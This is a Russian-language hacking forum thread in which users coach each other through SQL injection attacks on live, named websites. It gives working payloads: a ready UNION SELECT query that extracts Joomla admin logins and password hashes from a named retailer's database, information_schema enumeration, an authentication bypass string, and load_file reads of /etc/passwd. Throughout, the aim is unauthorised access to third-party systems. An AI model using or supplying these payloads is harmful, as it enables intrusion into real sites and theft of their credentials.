http://188.230.77.4:80/src/damagetypes.php?id=%bf'%bf" помогите раскрутить иньекцию. Вообщем сканерюга выдает ошибку SQL, но UNION , ORDER BY и GROUP BY не работают, и база даных реагирует только на кирилицу и только тогда виплевывает ошыбку, может кто то что то подскажет потому что я уже мозги сломал. Помогите пожалуйста, посмотрите что можна сделать!
pirat0 Ну если не знаешь о чем ошибка,то вбей ее в гугл или религия не позволяет? Двиг скачал бы,а не фигней страдал=\ src/damagetypes.php PHP: <?php //... include($gl_root_path . 'include/functions_common.php'); //тут функции //... if ( isset($_GET['id']) ) { // get and check $content['damageid'] = DB_RemoveBadChars($_GET['id']); //вот функция,там addslashes // --- BEGIN Get Weapon Info's $sqlquery = "SELECT " . STATS_DAMAGETYPES . ".DAMAGETYPE, " . STATS_DAMAGETYPES . ".DisplayName " . " FROM " . STATS_DAMAGETYPES . " WHERE " . STATS_DAMAGETYPES . ".DAMAGETYPE = '" . $content['damageid'] . "' " . " LIMIT 1 "; //запрос $result = DB_Query($sqlquery); //.... ?> src/include/functions_common.php PHP: <?php //.... require_once($gl_root_path . 'include/functions_db.php'); //.... ?> src/include/functions_db.php PHP: <?php //.... function DB_RemoveBadChars($myString) { // Replace with internal PHP Functions! if ( !get_magic_quotes_runtime() ) return addslashes($myString); else return $myString; /* OLD CODE! $returnstr = str_replace("\\","\\\\",$myString); $returnstr = str_replace("'","\\'",$returnstr); return $returnstr; */ } //.... ?> Кароче там надо разбираться,желания у меня нету,но запрос с ковычками у тебя уже точно не пройдет,т.к. даже если мг=офф,то еддслешес. А сама ошибка вызвана кодировками.
~d0s~ спс буду разбиратса, но чувствую врятли что то у меня получитса((, может подскажеш что куда нада тыкать (ну в смисле не в глобальном плане "юзай гугл")
Подскажите, попадаются такого вида таблицы. В них есть что-нибудь полезное, или нет. Версия 5.1.44-community-log Code: CHARACTER_SETS COLLATIONS COLLATION_CHARACTER_SET_APPLICABILITY COLUMNS COLUMN_PRIVILEGES ENGINES EVENTS FILES GLOBAL_STATUS GLOBAL_VARIABLES KEY_COLUMN_USAGE PARTITIONS PLUGINS PROCESSLIST PROFILING REFERENTIAL_CONSTRAINTS ROUTINES SCHEMATA SCHEMA_PRIVILEGES SESSION_STATUS SESSION_VARIABLES STATISTICS TABLES TABLE_CONSTRAINTS TABLE_PRIVILEGES TRIGGERS USER_PRIVILEGES VIEWS PAGE_COUNTER answer klimat klimat0001 poll poll_ip poll_main poll_topics jos_banner jos_bannerclient jos_bannertrack jos_categories jos_components jos_contact_details jos_content jos_content_frontpage jos_content_rating jos_core_acl_aro jos_core_acl_aro_groups jos_core_acl_aro_map jos_core_acl_aro_sections jos_core_acl_groups_aro_map jos_core_log_items jos_core_log_searches jos_csvi_configuration jos_csvi_templates jos_easypart jos_easypart_badwords jos_groups jos_jce_extensions jos_jce_groups jos_jce_plugins jos_jp_exclusion jos_jp_inclusion jos_jp_profiles jos_jp_registry jos_jp_stats jos_jp_temp jos_liex_id_linker jos_linkexchange_categ
да ничего полезного там, всякая ненужная мелочь вроде логина-пароля от админки джумлы в таблице jos_users
ti pomoemu group_concat() zdelal..i group_concat() ne vidaet bolse 1024 simvolov..zdelay concat() s limit-om.. i u tebya tam kajetsya joomla..tam dlya tebe est tablica kotoriy group_concat() virezal : jos_users //транслитом не писать!, предупреждаю.
Я получил колонки из jos_users Но информация из username и password не выводится, в чём причина? Пишет ошибку И так не выводит
Skipp , http://***.ru/catalog.php?productid=2654+and+1=0+union+select+1, 2,3,4,5,6,7,8,username,password,10,11,12,13,14,15, 16,17,18,19,20+from+imya bd.jos_users+limit+0,1--+
xarko_v По твоему способу тоже не выводит. Я уже пробовал по разному: Команда database() говорит что я работаю с БД bestshop_belklimat. Пробовал подставлять все базы по очереди и в запрос от xarko_v и в свой выше указанный. Что ещё посоветуете?
http://www.belklimat.by/catalog.php?productid=2654+and+1=0+union+select+1,2,3,4,5,6,7,8,concat%28username,0x3a,password%29,10,11,12,13,14,15,%2016,17,18,19,20+from+bestshop_bestshop.jos_users+limit+0,1--+ вот готовый запрос для хэша и логина чтоб в следующий раз такие вопросы не задавать, хоть примерно пойми синтаксис запросов и статьи повнимательней почитай
а когда вы начнете читать? =\ group_concat(schema_name) from information_schema.schemata кол.во - count(schema_name) from information_schema.schemata
нашел на одном сайте при вводе логина и пасса ставлю кавычку (') пишет: Не удалось выполнить запрос! подскажите какие еще запросы есть наподобие (' or 1=1)
Рекомендую читать мануалы по иньекциям(см. раздел Статьи), хотя имхо иньекция в авторизации сейчас большая редкость. Если коротко в данном случае я бы рекомендовал использовать что-то типа Admin'+--+ где Admin - логин администратора а комментарий -- отсекает проверку пароля. Возможно после кавычки надо будет добавить закрывающую скобку, возможно не одну. И если кавычка реально работает то вместо комментария -- скорее всего можно использовать /* если речь идет о mysql. Теперь мой вопрос: Столкнулся со слепой иньекцией типа union+select+555+--+, ошибка не выводится, но выводится название товара с id=555. Товаров достаточно много, так что теоретически существует возможность создать словарик соответствий выводимого названия товара и инжектируемого айди. После чего уже быстро получать значение нужной переменной, ибо на один символ будет приходиться один запрос. Вопрос в том, существуют ли уже какие-то тулзы для автоматизации этого процесса и если нету, то есть ли в такой тулзе необходимость ибо руки не из жопу растут, могу и написать. В принципе согласен можно и не заморачиваться и стандартными методами blind раскручивать, но это не интересно и кроме в моем случае кое-какие символы фильтруются и проги эту иньекцию не кушают.
загрузил файл /etc/passwd через sql injection (и дальше наподобие) #loginass:1002:65533::0:0::/var/www/xxx.xxx.com:/usr/local/bin/bash #login1ass1:1000:1000::0:0:user1:/home/alx:/sbin/nologin получается login и pass от домена xxx.xxx.com/admin ? blabla:*:1001:65533:ftp-access to xxx.xxx.net:/var/www/xxx.xxx.net/docs:/sbin/nologin а это что значит? какие еще значения можно загрузить через load file() имею ввиду конфигурационные файлы